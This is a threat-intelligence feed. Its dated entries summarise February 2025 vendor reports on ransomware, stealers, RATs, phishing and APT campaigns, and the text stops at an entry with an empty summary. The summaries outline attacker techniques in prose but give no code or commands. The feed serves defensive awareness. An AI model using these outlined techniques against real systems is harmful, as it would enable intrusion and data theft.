Browser fingerprinting is a growing threat used by cybercriminals to collect unique identifiers from users without their consent, allowing fraudsters to bypass security measures and impersonate victims. A recent campaign identified by Group-IB involved the malicious injection of a fingerprinting script into compromised Magento websites, affecting over 115 e-commerce sites. This script silently collects data like browser settings, plugins, and system properties from desktop users. The implications for both individuals and businesses are significant, leading to account lockouts and fraud.
Source: https://www.group-ib.com/blog/fingerprint-heists/
2025-02-25
Check_Point_CVE_2024_24919_Exploit_Attack
LOW
Intel Source:
CheckPoint
Intel Name:
Check_Point_CVE_2024_24919_Exploit_Attack
Date of Scan:
2025-02-25
Impact:
LOW
Summary:
A recently discovered cyberattack leverages the CVE-2024-24919 vulnerability in Check Point's security framework, which was patched in May 2024. Attackers exploit this flaw to steal VPN credentials and deploy ShadowPad malware; in some cases, NailaoLocker ransomware is also installed. The attackers used lateral movement techniques, such as RDP and SMB, to escalate privileges and target Domain Controllers. The campaign primarily impacted organizations in Europe, Africa, and the Americas, especially within the manufacturing sector.
Source: https://blog.checkpoint.com/security/check-point-research-explains-shadow-pad-nailaolocker-and-its-protection/
2025-02-25
LCRYX_Ransomware
MEDIUM
Intel Source:
K7 Security Labs
Intel Name:
LCRYX_Ransomware
Date of Scan:
2025-02-25
Impact:
MEDIUM
Summary:
Researchers from K7 Labs have discovered the LCRYX ransomware, which first emerged in November 2024. It is written in VBScript and demands a ransom in Bitcoin to decrypt the victim's system. The ransomware runs with full admin access and disables antivirus protection. It blocks access to Task Manager, CMD, and the Control Panel and deletes backup files to prevent users from recovering their data. It encrypts files with the .lcryx extension. Once encryption is complete, LCRYX generates a ransom note on the desktop that instructs victims to visit a website and pay the ransom in Bitcoin for file decryption.
Source: https://labs.k7computing.com/index.php/lcryx-ransomware-how-a-vb-ransomware-locks-your-system/
2025-02-25
QR_Code_Phish_Steals_Microsoft_Login
MEDIUM
Intel Source:
ThreatDown
Intel Name:
QR_Code_Phish_Steals_Microsoft_Login
Date of Scan:
2025-02-25
Impact:
MEDIUM
Summary:
Researchers at ThreatDown have uncovered a phishing attack targeting employees through personalized emails that promise "enhanced bonuses" and include a QR code that leads to a fake Microsoft login page. The email appears to originate from a trusted HR department, making it more challenging for employees to identify it as a scam. Once the victim inputs their corporate login credentials, the attackers can steal sensitive data and potentially initiate further attacks, such as ransomware.
Source: https://www.threatdown.com/blog/enhanced-bonus-qr-code-phish-steals-microsoft-credentials/
2025-02-24
Confluence_Exploit_Triggers_LockBit_Ransomware
HIGH
Intel Source:
The DFIR Report
Intel Name:
Confluence_Exploit_Triggers_LockBit_Ransomware
Date of Scan:
2025-02-24
Impact:
HIGH
Summary:
The attack began by exploiting a Confluence vulnerability (CVE-2023-22527) on an exposed Windows server, which led to the deployment of LockBit ransomware. The attacker used mshta to deploy a Metasploit stager and then installed AnyDesk for persistent access. After terminating processes, they regained control, created a new admin account, and moved laterally via RDP, targeting a backup server and extracting Veeam credentials. Data was exfiltrated using Rclone. On the domain controller, the attacker enumerated admin group memberships and launched LockBit ransomware with PDQ Deploy, encrypting systems within two hours.
Source: https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/
2025-02-24
Deployment_of_AsyncRAT
LOW
Intel Source:
Cyble
Intel Name:
Deployment_of_AsyncRAT
Date of Scan:
2025-02-24
Impact:
LOW
Summary:
Cyble researchers have identified a malware campaign that tricks users into running malicious files disguised as wallpapers with animated characters. The attackers use malicious LNK files to execute a hidden PowerShell script, which downloads and runs additional payloads. They employ an open-source tool called Null-AMSI to bypass Windows security features and avoid detection. The malware encrypts and compresses its payloads using AES encryption and GZIP compression. The final payload installs AsyncRAT, which allows attackers to control the compromised system, steal data and deploy more malware.
Source: https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/
2025-02-24
Fake_CAPTCHA_Campaign
LOW
Intel Source:
Cyfirma
Intel Name:
Fake_CAPTCHA_Campaign
Date of Scan:
2025-02-24
Impact:
LOW
Summary:
Cyfirma researchers have uncovered a fake CAPTCHA verification campaign, known as ClickFix, that tricks users into downloading and running malware. In this campaign, users are redirected to a phishing page to complete a fake CAPTCHA. Once the user clicks the link, a PowerShell script executes and downloads malware from remote servers. The PowerShell script operates silently and retrieves a ZIP file containing Lumma Stealer, which is designed to harvest sensitive information.
Source: https://www.cyfirma.com/research/fake-captcha-malware-campaign-how-cybercriminals-use-deceptive-verifications-to-distribute-malware/
2025-02-24
LummaC2_Malware_disguise_as_Total_Commander
LOW
Intel Source:
ASEC
Intel Name:
LummaC2_Malware_disguise_as_Total_Commander
Date of Scan:
2025-02-24
Impact:
LOW
Summary:
ASEC researchers have observed cybercriminals distributing the LummaC2 stealer disguised as a cracked version of Total Commander, a Windows file manager. The attackers target users searching for "Total Commander Crack" on Google; if a user clicks on the result, they are routed through multiple websites before the malware is downloaded. The attackers also post fake requests on Reddit and add malicious links in their replies to lure victims.
Source: https://asec.ahnlab.com/ko/86396/
2025-02-21
Ghost_Cring_Ransomware
HIGH
Intel Source:
CISA
Intel Name:
Ghost_Cring_Ransomware
Date of Scan:
2025-02-21
Impact:
HIGH
Summary:
The FBI, CISA, and MS-ISAC have issued a joint advisory on Ghost (Cring) ransomware, detailing the methods and impact of attacks by this group of threat actors, primarily located in China. Ghost actors target organizations globally, exploiting vulnerabilities in outdated software and firmware to infiltrate networks, with a focus on critical infrastructure, healthcare, education, and small businesses. These attackers use common tools like Cobalt Strike and Mimikatz for privilege escalation and credential theft, and employ tactics to evade detection and hinder system recovery. Ghost actors typically encrypt data using various ransomware executables and demand ransom in cryptocurrency for decryption keys. While exfiltration is rare, the encrypted data remains inaccessible without payment.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
2025-02-21
TA2726_and_TA2727_Identified
MEDIUM
Intel Source:
Proofpoint
Intel Name:
TA2726_and_TA2727_Identified
Date of Scan:
2025-02-21
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have discovered two new cybercriminal threat actors, TA2726 and TA2727, who run web inject campaigns and distribute malware. These actors use hijacked websites to serve bogus update-themed lures, adding to the already complicated landscape of web inject attacks. Notably, TA2727 was observed delivering FrigidStealer, a newly discovered macOS information stealer, as well as malware for Windows and Android.
Source: https://www.proofpoint.com/us/blog/threat-insight/update-fake-updates-two-new-actors-and-new-mac-malware
2025-02-21
Earth_Preta_Blends_Legit_and_Malicious_Files
LOW
Intel Source:
Trend Micro
Intel Name:
Earth_Preta_Blends_Legit_and_Malicious_Files
Date of Scan:
2025-02-21
Impact:
LOW
Summary:
Trend Micro researchers have discovered that Earth Preta (Mustang Panda) uses Microsoft Application Virtualization Injector to inject payloads into waitfor.exe when detecting ESET antivirus. They employ Setup Factory to drop and execute malicious payloads, ensuring persistence and evading detection. The attack involves dropping multiple files, including legitimate executables and a decoy PDF to mislead the victim. The malware, a variant of TONESHELL, is sideloaded with a legitimate Electronic Arts application and communicates with a command-and-control server for data exfiltration.
Source: https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html
2025-02-20
Phishing_Campaign_Targets_Amazon_Users
LOW
Intel Source:
Cofense
Intel Name:
Phishing_Campaign_Targets_Amazon_Users
Date of Scan:
2025-02-20
Impact:
LOW
Summary:
Researchers from Cofense have uncovered a phishing campaign targeting Amazon Prime users. The campaign starts with an email that appears to be a legitimate notification from Amazon Prime, claiming that the recipient's payment method has expired or is no longer valid. The email creates a sense of urgency, pushing the recipient to click a button to check their payment information. When the user clicks the link, they are redirected to a Google Docs page. The tactic targets login credentials and additional details such as security-question answers and payment details for illicit purposes.
Source: https://cofense.com/blog/amazon-phish-hunts-for-security-answers-and-payment-information
2025-02-20
New_Variant_of_Snake_Keylogger
LOW
Intel Source:
Fortinet
Intel Name:
New_Variant_of_Snake_Keylogger
Date of Scan:
2025-02-20
Impact:
LOW
Summary:
FortiGuard researchers have discovered a new variant of Snake Keylogger, also known as the 404 Keylogger, targeting Windows users. This malware mainly focuses on China, Turkey, Indonesia, Taiwan, and Spain. It has been identified as AutoIt/Injector.GTY!tr and has been responsible for over 280 million blocked infection attempts worldwide. This variant of Snake Keylogger spreads primarily through phishing emails that contain either an attachment or a link. It targets web browsers such as Chrome, Edge and Firefox, stealing sensitive information by logging keystrokes, capturing credentials and monitoring the clipboard. The stolen data is then exfiltrated to its C2 server via email and Telegram bots.
Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant
2025-02-20
Phishing_Campaign_Drops_Zhong_Stealer
LOW
Intel Source:
Any.Run
Intel Name:
Phishing_Campaign_Drops_Zhong_Stealer
Date of Scan:
2025-02-20
Impact:
LOW
Summary:
Researchers at ANY.RUN have observed a phishing campaign distributing a newly discovered stealer malware, Zhong Stealer, that targets the cryptocurrency and finance sectors. The Quetzal Team monitored this campaign from December 20 to 24, 2024, during which phishing tactics were used to deceive customer care team members into opening malicious ZIP files.
Source: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/
2025-02-20
Arechclient2_Malware
LOW
Intel Source:
malwr-analysis
Intel Name:
Arechclient2_Malware
Date of Scan:
2025-02-20
Impact:
LOW
Summary:
Arechclient2, also known as SectopRAT, is a .NET malware that gives attackers remote access to an infected system. It uses an obfuscation technique called Calli obfuscation, which makes it hard to detect. The malware has various capabilities, including scanning web browsers to collect information about installed extensions, saved usernames, passwords, and cookies. It searches for VPN services like NordVPN and ProtonVPN, gathers system details such as hardware and operating system information, and collects Telegram and Discord settings. Additionally, it searches for FTP credentials and cryptocurrency wallets to steal financial data.
Source: https://malwr-analysis.com/2025/02/18/arechclient2-malware-analysis-sectoprat/
2025-02-19
Rhadamanthys_Distributed_via_MSC_Extension
LOW
Intel Source:
ASEC
Intel Name:
Rhadamanthys_Distributed_via_MSC_Extension
Date of Scan:
2025-02-19
Impact:
LOW
Summary:
Researchers at AhnLab have identified that the Rhadamanthys infostealer is being distributed using files with the .MSC extension, which are associated with Microsoft Management Console (MMC). These files allow the execution of various scripts, commands or programs. The attackers are using two methods to execute the malicious MSC files: the first exploits a vulnerability (CVE-2024-43572) that is no longer effective because Microsoft has patched it, and the second uses a Console Taskpad to run malicious commands.
Source: https://asec.ahnlab.com/ko/86354/
2025-02-19
GhostWeaver_Backdoor
LOW
Intel Source:
Trac Labs
Intel Name:
GhostWeaver_Backdoor
Date of Scan:
2025-02-19
Impact:
LOW
Summary:
TRAC Labs researchers have uncovered a malware campaign that tricks users with fake browser update notifications on compromised websites. When a user clicks on the notification, a JavaScript file runs in the background and downloads a malware loader called MintsLoader. This loader then installs an advanced PowerShell-based backdoor named GhostWeaver. The malware allows attackers to maintain remote control over the compromised system by connecting to its C2 server. It is designed to steal sensitive information such as saved passwords from web browsers like Chrome, Firefox and Edge, Outlook emails and cryptocurrency wallets.
Source: https://trac-labs.com/dont-ghost-the-socgholish-ghostweaver-backdoor-574154dd9983
2025-02-19
Malicious_PoC_Exploit_Abuse_on_GitHub
LOW
Intel Source:
K7 Labs
Intel Name:
Malicious_PoC_Exploit_Abuse_on_GitHub
Date of Scan:
2025-02-19
Impact:
LOW
Summary:
Researchers at K7 Labs have observed that a spelling error in their proof-of-concept exploit release for CVE-2024-49112 resulted in threat actors creating a malicious GitHub repository. The attackers attempted to fool researchers and security professionals by falsely claiming that their file was the legitimate proof of concept for CVE-2024-49113. This case shows how tiny faults can be used for malicious purposes.
Source: https://labs.k7computing.com/index.php/ldapnightmare-spoof-stealer/
2025-02-18
Phishing_Attack_Uses_Pinterest_Bookmarks
LOW
Intel Source:
SpiderLabs
Intel Name:
Phishing_Attack_Uses_Pinterest_Bookmarks
Date of Scan:
2025-02-18
Impact:
LOW
Summary:
A phishing campaign is using fake timesheet report emails to spread the Tycoon 2FA phishing kit. The attackers are now exploiting Pinterest visual bookmarks as intermediaries to deceive users and steal sensitive information.
Source: https://x.com/SpiderLabs/status/1891529685755998521
2025-02-18
Go_Based_Backdoor_Using_Telegram_C2
LOW
Intel Source:
Netskope
Intel Name:
Go_Based_Backdoor_Using_Telegram_C2
Date of Scan:
2025-02-18
Impact:
LOW
Summary:
Netskope researchers have discovered a new Go-based backdoor malware, potentially of Russian origin. The malware uses Telegram as its command and control (C2) channel, which is uncommon but highly effective. This makes detection difficult for defenders. The malware appears to still be under development but is already fully functional. Using cloud apps like Telegram for C2 communication allows attackers to bypass infrastructure requirements and blend in with normal user activity, complicating detection efforts.
Source: https://www.netskope.com/blog/telegram-abused-as-c2-channel-for-new-golang-backdoor
2025-02-18
Latest_Attacks_by_CL0P_Ransomware
MEDIUM
Intel Source:
CYFIRMA
Intel Name:
Latest_Attacks_by_CL0P_Ransomware
Date of Scan:
2025-02-18
Impact:
MEDIUM
Summary:
The Cl0p ransomware group, active since 2019, recently targeted 43 organizations and exfiltrated sensitive data. This attack targets various industries, including manufacturing, retail, transportation, software, finance, internet, and business services. The affected organizations are located in multiple countries, including the US, Canada, Netherlands, France, and Greece. While the names of the targeted organizations have been published on the group's leak site, the exfiltrated data has not yet been released.
Source: https://www.cyfirma.com/research/cl0p-ransomware-latest-attacks/
2025-02-17
Golden_Mexican_Wolf_Ransomware_Group
MEDIUM
Intel Source:
Scilabs
Intel Name:
Golden_Mexican_Wolf_Ransomware_Group
Date of Scan:
2025-02-17
Impact:
MEDIUM
Summary:
Researchers from Scilabs have identified a new ransomware called Golden Mexican Wolf, which targets organisations in Mexico's service sector. Its primary focus is financial gain through stealing and encrypting sensitive information from victims. The group remains hidden within the network while conducting reconnaissance, dumping credentials and maintaining persistence across the network. Its primary target is Active Directory, which it uses to distribute the ransomware and encrypt data. The operators often contact victims through SMS, email and WhatsApp in English and Spanish, send samples of the stolen information, and threaten to release it if the ransom is not paid.
Source: https://blog.scilabs.mx/en/golden-mexican-wolf-new-ransomware-targeting-mexico/
2025-02-17
Vdog_Ransomware
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Vdog_Ransomware
Date of Scan:
2025-02-17
Impact:
MEDIUM
Summary:
Researchers at Cyfirma have discovered the Vgod ransomware which targets Windows systems. It encrypts files and renames them by adding the .Vgod extension while modifying the desktop wallpaper. The attackers employ a double extortion tactic in which they steal sensitive information and threaten victims to publish it.
Source: https://www.cyfirma.com/research/vgod-ransomware/
2025-02-17
Lynx_Ransomware_Evolution
LOW
Intel Source:
Fortinet
Intel Name:
Lynx_Ransomware_Evolution
Date of Scan:
2025-02-17
Impact:
LOW
Summary:
Researchers at FortiGuard Labs have analyzed the Lynx ransomware, which was first seen in July 2024. It closely resembles INC ransomware, which first surfaced in July 2023, prompting researchers to suspect that Lynx is an improved version. Both ransomware families encrypt files on Windows systems, display a ransom note on the desktop, and attempt to print it.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-lynx
2025-02-17
Windows_UI_Vulnerability_Exploited_by_APT
LOW
Intel Source:
ClearSky Cyber Security
Intel Name:
Windows_UI_Vulnerability_Exploited_by_APT
Date of Scan:
2025-02-17
Impact:
LOW
Summary:
ClearSky researchers have identified a UI vulnerability in Microsoft Windows that is being actively exploited by the Chinese APT group, Mustang Panda. The vulnerability affects RAR file extraction, where extracted files become invisible in Windows Explorer, appearing as empty folders. These files are still accessible via command line if the exact path is known. Additionally, executing the "attrib -s -h" command can reveal system-protected files, leading to the creation of an unknown ActiveX component with an "Unknown" file type.
Source: https://x.com/ClearskySec/status/1890056915230544224
2025-02-17
CVE_2025_0411_Exploited_in_Ukraine
LOW
Intel Source:
Trend Micro
Intel Name:
CVE_2025_0411_Exploited_in_Ukraine
Date of Scan:
2025-02-17
Impact:
LOW
Summary:
Researchers at Trend Micro have discovered the active exploitation of a 7-Zip zero-day vulnerability, CVE-2025-0411, in a SmokeLoader malware campaign targeting Ukrainian enterprises. This bug, discovered in September 2024, enables attackers to evade Windows Mark-of-the-Web protections via double archiving, allowing malicious files to be executed without security checks. Russian cybercriminals used spear-phishing operations and homoglyph attacks to impersonate document extensions, aiding malware delivery. The vulnerability was disclosed to the developer of 7-Zip, resulting in a patch in version 24.09, which was released on November 30, 2024.
Source: https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html
2025-02-16
RedCurl_EarthKapre_APT_Attack_Chain
LOW
Intel Source:
Esentire
Intel Name:
RedCurl_EarthKapre_APT_Attack_Chain
Date of Scan:
2025-02-16
Impact:
LOW
Summary:
Researchers from eSentire have identified a sophisticated cyber espionage campaign by the EarthKapre/RedCurl APT group aimed at the legal sector. The attack starts with a phishing email containing an Indeed-themed PDF that tricks victims into downloading a malicious ISO package. When mounted, this file presents a seemingly legitimate Adobe program (ADNotificationManager.exe), which then loads the EarthKapre loader (netutils.dll).
Source: https://www.esentire.com/blog/unraveling-the-many-stages-and-techniques-used-by-redcurl-earthkapre-apt
2025-02-16
DeepSeek_ClickFix_Campaign
LOW
Intel Source:
Cloudsek
Intel Name:
DeepSeek_ClickFix_Campaign
Date of Scan:
2025-02-16
Impact:
LOW
Summary:
CloudSEK researchers have identified a new ClickFix phishing campaign in which threat actors exploit the popularity of DeepSeek. In this campaign, victims are tricked into clicking fake CAPTCHA verification links. These links redirect victims to the installation of malware such as Vidar and Lumma, which steal sensitive information like passwords, banking details and browser data.
Source: https://www.cloudsek.com/blog/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late
2025-02-16
Fake_Adobe_App_Abusing_Microsoft_Login
LOW
Intel Source:
Cofense
Intel Name:
Fake_Adobe_App_Abusing_Microsoft_Login
Date of Scan:
2025-02-16
Impact:
LOW
Summary:
Cofense researchers have discovered a phishing campaign targeting Microsoft users by tricking them into revealing their login credentials. The attack starts with a deceptive email that appears to be an Office 365 password reset request; however, the sender's email address is not associated with a Microsoft domain. In this campaign, users are redirected to a legitimate Microsoft authentication page where they are asked to grant permission to a malicious third-party application called Adobe Drive X. If the user approves the request and enters credentials, the attackers can steal sensitive information and potentially gain access to the victim's emails.
Source: https://cofense.com/blog/oauth-phishing-alert-fake-adobe-drive-x-app-abusing-microsoft-login
2025-02-16
Russian_Threat_Actors_Target_M365_Accounts
LOW
Intel Source:
Volexity
Intel Name:
Russian_Threat_Actors_Target_M365_Accounts
Date of Scan:
2025-02-16
Impact:
LOW
Summary:
Researchers at Volexity have identified multiple Russian threat actors performing social engineering and spear-phishing attempts to breach Microsoft 365 accounts using Device Code Authentication phishing. These attacks, which began in mid-January 2025, were politically motivated and included impersonations of officials from the United States Department of State, Ukraine's Ministry of Defense, and the European Union Parliament. Phishing emails, Microsoft Teams invitations, and secure chat applications were used by the threat actors to trick victims into granting them access.
Source: https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/
2025-02-15
North_Korea_Exploits_Remote_Work_For_Fraud
MEDIUM
Intel Source:
Recorded Future
Intel Name:
North_Korea_Exploits_Remote_Work_For_Fraud
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
North Korea is taking advantage of the rise of remote work to infiltrate international companies with fraudulent IT workers using false identities. These operatives violate sanctions, engage in fraud, and pose significant cybersecurity risks, including data theft and cyber espionage. They are linked to cyberattacks targeting the cryptocurrency industry, utilizing malware to steal sensitive information and maintain persistent access. Furthermore, North Korea has created fake IT companies to further embed itself in global supply chains.
Source: https://go.recordedfuture.com/hubfs/reports/cta-nk-2025-0213.pdf
2025-02-15
Winnti_Group_Targeting_Japanese_Organisations
MEDIUM
Intel Source:
LAC Watch
Intel Name:
Winnti_Group_Targeting_Japanese_Organisations
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
LAC Watch researchers have uncovered a new attack campaign dubbed RevivalStone, conducted by the Chinese threat actor Winnti group (also known as APT41) and targeting Japanese companies in the manufacturing, materials, and energy sectors. This campaign has been active since March 2024, with attackers exploiting SQL injection vulnerabilities in ERP systems to gain initial access. They install web shells like China Chopper, Behinder, and a sqlmap file uploader, which allow them to move through the network, steal credentials and gather intelligence. After gaining access, the attackers deploy an advanced version of the Winnti malware and use AES and ChaCha20 encryption to secure communications.
Source: https://www.lac.co.jp/lacwatch/report/20250213_004283.html
2025-02-15
Analyzing_DEEP_DRIVE
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
Analyzing_DEEP_DRIVE
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
Securonix researchers have identified an ongoing campaign called DEEP#DRIVE targeting South Korean businesses, government agencies and cryptocurrency users. The attackers use phishing emails with malicious attachments disguised as legitimate documents such as work logs, insurance forms and crypto-related files to trick victims into opening them. Once a user opens these files, an LNK file initiates a PowerShell script that installs malware which gathers system information and sends it back to the attackers through Dropbox. These files are often in .hwp, .xlsx or .pptx formats and are hosted on Dropbox. Researchers have attributed this campaign to Kimsuky, a North Korean APT group, based on its TTPs and the use of the same Dropbox technique in prior campaigns.
Source: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/
2025-02-15
JavaScript_to_C2_Server_Malware
LOW
Intel Source:
CYFIRMA
Intel Name:
JavaScript_to_C2_Server_Malware
Date of Scan:
2025-02-15
Impact:
LOW
Summary:
Cyfirma researchers have analyzed a sophisticated multi-stage malware attack using obfuscation, steganography, and covert communication to bypass detection. It begins with a disguised JavaScript file that executes a PowerShell script, which downloads a malicious JPG image and text file containing hidden executables. These payloads deploy Stealer malware to steal sensitive data, including credentials and browser information. The stolen data is sent to a Telegram bot, allowing attackers to maintain persistence while evading traditional security measures. The attack's use of legitimate services, encryption, and multi-layered obfuscation makes detection and mitigation difficult.
Source: https://www.cyfirma.com/research/javascript-to-command-and-control-c2-server-malware/
2025-02-14
Fake_Etsy_Invoice_Scam
LOW
Intel Source:
MalwareBytes
Intel Name:
Fake_Etsy_Invoice_Scam
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Malwarebytes researchers have identified a phishing campaign in which cybercriminals target Etsy sellers. The campaign starts with phishing emails that contain a PDF invoice hosted on a legitimate Etsy domain (etsystatic.com). The attached PDF contains a link that asks the seller to confirm their identity or verify their account. Once the seller clicks the link, it redirects them to a fake Etsy login page designed to steal payment information, which scammers can then use for fraudulent purchases or sell on the dark web.
Source: https://www.malwarebytes.com/blog/news/2025/02/fake-etsy-invoice-scam-tricks-sellers-into-sharing-credit-card-information
2025-02-14
Fake_Media_Targets_German_Elections
LOW
Intel Source:
Recorded Future
Intel Name:
Fake_Media_Targets_German_Elections
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered ongoing Russian influence activities aimed at the German federal elections on February 23, 2025. These operations, linked to networks like Doppelgänger, Operation Overload, CopyCop, and Operation Undercut, seek to raise sociopolitical issues, alter public discourse, and undermine trust in democratic institutions.
Source: https://www.recordedfuture.com/research/stimmen-aus-moskau-russian-influence-operations-target-german-elections
2025-02-13
China_Espionage_Tools_Used_in_Ransomware_Attack
LOW
Intel Source:
Symantec
Intel Name:
China_Espionage_Tools_Used_in_Ransomware_Attack
Date of Scan:
2025-02-13
Impact:
LOW
Summary:
In late 2024, tools traditionally used by China-linked espionage groups were deployed in a ransomware attack against a South Asian software company. The attacker exploited a vulnerability in Palo Alto's PAN-OS firewall to gain access, steal cloud credentials, and encrypt the target's machines with RA World ransomware. Interestingly, the tools used were the same as those involved in previous espionage attacks, including the PlugX backdoor. This unusual blend of espionage tools with ransomware raises questions about whether China-linked actors are expanding into financially motivated attacks, a behavior typically seen in other nations like North Korea. The motives behind this shift remain unclear, but it suggests evolving tactics in cyber threats.
Source: https://www.security.com/threat-intelligence/chinese-espionage-ransomware
2025-02-13
The_BadPilot_Campaign
MEDIUM
Intel Source:
Microsoft
Intel Name:
The_BadPilot_Campaign
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Microsoft researchers have uncovered a subgroup within the Russian state actor Seashell Blizzard that conducts cyberattacks globally and compromises internet-facing infrastructure to maintain long-term access to high-value targets. This group has been active since 2021 and is known for stealthy persistence, credential theft and lateral movement within compromised networks. It targets critical sectors such as energy, oil and gas, telecommunications, shipping, arms manufacturing, and government institutions. The group has leveraged published vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to gain initial access. It follows three primary approaches: targeted attacks using phishing and backdoors, opportunistic attacks exploiting vulnerabilities in internet-facing infrastructure, and hybrid attacks using supply-chain compromises.
Source: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
2025-02-13
REF7707_Campaign_Targeting_South_America
MEDIUM
Intel Source:
Elastic
Intel Name:
REF7707_Campaign_Targeting_South_America
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have discovered a cyber espionage campaign called REF7707 targeting the foreign ministry of a South American country. This campaign is linked to previous attacks in South Asian countries. The REF7707 attackers rely on advanced malware such as FINALDRAFT, GUIDLOADER and PATHLOADER, which are designed to infiltrate systems, execute malicious code and exfiltrate sensitive data. The FINALDRAFT malware has both Windows and Linux versions and is capable of stealing data and injecting itself into other programs. The campaign's main tactic is the use of cloud services and third-party platforms for C2 communication.
Source: https://www.elastic.co/security-labs/fragile-web-ref7707
2025-02-12
FCI_Job_Scam_Delivers_Xelera_Ransomware
LOW
Intel Source:
Seqrite
Intel Name:
FCI_Job_Scam_Delivers_Xelera_Ransomware
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Seqrite researchers have recently uncovered multiple campaigns involving fake job descriptions targeting individuals applying for technical positions at the Food Corporation of India (FCI). This campaign distributes a variant of ransomware called Xelera, written in Python and packed using PyInstaller. On January 18, 2025, a malicious document named FCEI-job-notification.doc was found on VirusTotal, containing an embedded payload in OLE streams. The payload, named jobnotification2025.exe, executes ransomware tasks and other malicious actions on the target machine via a Discord bot. PyInstaller continues to be a popular tool for deploying Python-based malware in the wild.
Source: https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/
2025-02-12
Nigerian_Cybercriminals_Distributing_XLogger
LOW
Intel Source:
Cyberarmor
Intel Name:
Nigerian_Cybercriminals_Distributing_XLogger
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Researchers from Cyberarmor have uncovered a malware campaign conducted by Nigerian cybercriminals that collects email addresses for distributing malware. The attackers start with email harvesting, gathering a list of potential victims through social media, dark web forums and Google Dorking techniques to find publicly available email addresses. They then launch phishing campaigns from spoofed domains and use Gammadyne Mailer to send bulk emails while hiding their identity with remote access tools. Once a recipient opens the infected file, the XLogger malware silently steals passwords and sensitive data from the system and then sends all the stolen data to the attacker's Telegram channel for further malicious activity.
Source: https://cyberarmor.tech/inside-a-malware-campaign-a-nigerian-hackers-perspective/
2025-02-12
StrelaStealer_Targeting_German_Speaking_Users
LOW
Intel Source:
Palo Alto
Intel Name:
StrelaStealer_Targeting_German_Speaking_Users
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Recent activity from StrelaStealer continues to utilize WebDAV servers, including the server at the IP address, to host malware. As of February 10, 2025, decoy PDF files are being used in the infection process; these are non-malicious but contain a blurred image to mislead victims. The malware is only triggered when the victim's Windows system has specific German language and locale settings (Austria, Germany, Liechtenstein, Luxembourg, Switzerland).
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-10-IOCs-for-StrelaStealer-activity.txt
2025-02-12
USB_Malware_Mines_Monero_in_South_Korea
LOW
Intel Source:
ASEC
Intel Name:
USB_Malware_Mines_Monero_in_South_Korea
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
ASEC researchers have discovered a case of cryptocurrency-mining malware spread via USB in South Korea. The malware, which mines Monero, uses PC resources without user consent. While mining itself isn't illegal, the unauthorized installation of mining software can be. The malware modifies system settings to optimize performance for mining, disables security measures like Windows Defender, and uses techniques like C&C communication through PostgreSQL and DLL sideloading to evade detection. The malware spreads rapidly via USB and generates significant profit, reportedly over 1 million won daily.
Source: https://asec.ahnlab.com/en/86221/
2025-02-12
NanoCore_RAT_Malware_Analysis
LOW
Intel Source:
malwr-analysis
Intel Name:
NanoCore_RAT_Malware_Analysis
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
NanoCore is a remote access trojan that cybercriminals use for espionage, information theft and taking control of compromised systems. It is a customizable malware that allows attackers to add features based on their requirements. The malware copies itself to a hidden folder and creates a registry entry to run automatically. It connects to remote C2 servers from which attackers can send commands to control the compromised system. The malware records keystrokes, takes screenshots and captures clipboard data, sending all of this stolen information back to the attacker.
Source: https://malwr-analysis.com/2025/02/10/nanocore-rat-malware-analysis/
2025-02-11
UAC0006_Targeting_Ukraine_Largest_Bank
LOW
Intel Source:
Cloudsek
Intel Name:
UAC0006_Targeting_Ukraine_Largest_Bank
Date of Scan:
2025-02-11
Impact:
LOW
Summary:
CloudSEK researchers have uncovered a phishing campaign conducted by a financially motivated threat group called UAC-0006 targeting Ukraine's largest state-owned bank, PrivatBank. The attackers leverage phishing emails containing password-protected ZIP or RAR files to trick victims into opening malicious files. These files run malicious JavaScript in the background, which triggers a hidden PowerShell command that downloads and installs the SmokeLoader malware. UAC-0006 effectively bypasses security detections and maintains long-term access to compromised systems by using JavaScript, VBScript and PowerShell.
Source: https://www.cloudsek.com/blog/getsmoked-uac-0006-returns-with-smokeloader-targeting-ukraines-largest-state-owned-bank
2025-02-10
JMagic_Campaign
MEDIUM
Intel Source:
Black Lotus Labs
Intel Name:
JMagic_Campaign
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
